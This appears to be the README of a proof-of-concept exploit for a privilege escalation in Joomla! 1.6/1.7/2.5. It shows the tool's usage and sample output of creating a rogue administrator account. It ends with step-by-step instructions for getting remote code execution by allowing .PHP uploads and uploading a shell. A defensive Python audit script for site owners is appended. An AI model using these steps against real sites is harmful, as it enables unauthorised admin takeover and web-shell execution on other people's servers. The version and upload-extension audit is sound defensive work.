A Python script to create an administrator account on Joomla! 1.6/1.7/2.5 using a privilege escalation vulnerability
Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.
- Admin user creation on vulnerable Joomla versions
- Supports HTTP/HTTPS, self-signed certificates and weak TLS cipher suites
- Step-by-step explanation of how to achieve RCE with this admin account
```
$ ./joomla-admin-account-creation.py -h
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

usage: joomla-admin-account-creation.py [-h] -t TARGET [-u USERNAME] [-e EMAIL] [-p PASSWORD] [-k] [-v]

PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL to Joomla account creation page.
  -u USERNAME, --username USERNAME
                        Username of the account to create.
  -e EMAIL, --email EMAIL
                        Email of the account to create.
  -p PASSWORD, --password PASSWORD
                        Password of the account to create.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -v, --verbose         Verbose mode. (default: False)
```
```
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

[>] Generating random values
[>] Username not supplied, using random username : g2V63EdOTt
[>] Email not supplied, using random email : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com
[>] Password not supplied, using random password : 64akMNEBMO
[>] Starting exploit
[>] Purposely failing account creation for user 'g2V63EdOTt' ...
[+] Password mismatch (this is expected)!
[+] Really creating account for user 'g2V63EdOTt' ...
[+] Account successfully created !
[+] You can connect to your new account:
 | username : g2V63EdOTt
 | password : 64akMNEBMO
 | email : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com
[+] To achieve Remote Code Execution (RCE):
 | 1. Login with the 'g2V63EdOTt' account on the admin panel: http://localhost:10080/administrator/index.php
 | 2. Go to the media page: http://localhost:10080/administrator/index.php?option=com_media
 | 2.1. Click on parameters on the top right of the page.
 | 2.2. Add .PHP in the list of allowed extensions.
 | 2.3. Upload your shell on the media page.
 | 3. Access your shell and enjoy.
[+] Exploit finished.
```
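For site owners, the two conditions this README depends on can be audited directly: a Joomla! version in the affected range, and a media manager allow-list that accepts executable extensions. The following is an added example, not part of the original PoC; the `upload_extensions` key name and the JSON layout of the media parameters are assumptions, and the sample parameters are constructed.

```python
import json
import re

# Extensions a PHP-enabled server may execute (constructed list; extend for your stack).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pht"}

# Constructed sample of media manager parameters; the key name is an assumption.
SAMPLE_MEDIA_PARAMS = '{"upload_extensions": "bmp,csv,doc,gif,jpg,.PHP,png"}'


def parse_version(version):
    """Return (major, minor, patch) from a string such as '2.5.2' or '1.7'."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised Joomla! version: {version!r}")
    return tuple(int(g or 0) for g in m.groups())


def is_affected(version):
    """Affected per the README: 1.6.x, 1.7.x, and 2.5.x before 2.5.3."""
    v = parse_version(version)
    return v[:2] in ((1, 6), (1, 7)) or (2, 5, 0) <= v < (2, 5, 3)


def risky_upload_extensions(media_params_json):
    """Return executable extensions present in the upload allow-list, sorted."""
    raw = json.loads(media_params_json).get("upload_extensions", "")
    allowed = {e.strip().lstrip(".").lower() for e in raw.split(",")}
    return sorted(allowed & EXECUTABLE_EXTS)


def audit(version, media_params_json):
    """Return a list of human-readable findings for one site."""
    findings = []
    if is_affected(version):
        findings.append(f"Joomla! {version} is in the affected range; upgrade to 2.5.3 or later")
    for ext in risky_upload_extensions(media_params_json):
        findings.append(f"media manager allows upload of executable extension '.{ext}'")
    return findings


if __name__ == "__main__":
    for finding in audit("1.7.5", SAMPLE_MEDIA_PARAMS):
        print("[!]", finding)
```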